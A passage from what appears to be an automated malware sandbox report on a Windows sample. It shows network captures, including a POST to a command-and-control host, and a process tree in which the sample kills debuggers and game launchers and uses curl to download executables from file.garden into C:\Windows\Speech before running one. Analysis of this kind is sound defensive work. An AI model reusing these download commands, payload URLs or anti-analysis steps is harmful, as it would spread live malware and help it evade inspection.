                                                                                                                                                                                                                                                                                    2024-09-30 16:20:27 UTC16384INData Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f
                                                                                                                                                                                                                                                                                    Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:27 UTC3768INData Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:27 UTC12INData Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                    Data Ascii: dy></html>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    9192.168.2.1049733172.67.197.404433768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:28 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                                                    Host: offeviablwke.site
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:28 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:28 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=43olhp0c9mnsn3fsvol9u4tlt8; expires=Fri, 24 Jan 2025 10:07:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3d%2Fh23c5NNUju4Q0Z6PfPrKaBx3mvQ%2FIl0IWRHAfOtHEsyBwXcbKj%2FVEL%2BvwnUsJXhHKvqwdghQMdaIF%2Fxok3lSbKktV2BcW0cXTuc7RTQHnBHCXLJSuciR%2Bsi8Tdrx5tep2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb58a5c5d310f5d-EWR
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:28 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                    Start time:12:19:55
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\UY9hUZn4CQ.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\UY9hUZn4CQ.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff60c470000
                                                                                                                                                                                                                                                                                    File size:101'888 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:206ADDAC1B15931A5A6F35222ECED8C8
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                                                    Start time:12:19:55
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                                    Start time:12:19:56
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                    Start time:12:19:56
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c color 7
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                    Start time:12:19:56
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                                                    Start time:12:19:57
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                                                    Start time:12:19:57
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im HTTPDebuggerUI.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                                                    Start time:12:19:58
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                    Start time:12:19:58
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                                                    Start time:12:19:58
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                                                    Start time:12:19:58
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                    Start time:12:19:59
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                    Start time:12:19:59
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                    Start time:12:19:59
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff79fbb0000
                                                                                                                                                                                                                                                                                    File size:530'944 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                                                    Start time:12:20:01
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                                                    Start time:12:20:01
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                                                    Start time:12:20:01
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                                                    Start time:12:20:01
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im Ida64.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                                                    Start time:12:20:04
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                                                    Start time:12:20:04
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im OllyDbg.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                    Start time:12:20:04
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\Speech\imxyvi.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Speech\imxyvi.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6a9510000
                                                                                                                                                                                                                                                                                    File size:233'472 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:6E90C863F1166A43E590204D055EE08A
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                                                    Start time:12:20:04
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                                                    Start time:12:20:05
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                    Start time:12:20:06
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff79fbb0000
                                                                                                                                                                                                                                                                                    File size:530'944 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                                                    Start time:12:20:06
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                                                    Start time:12:20:07
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
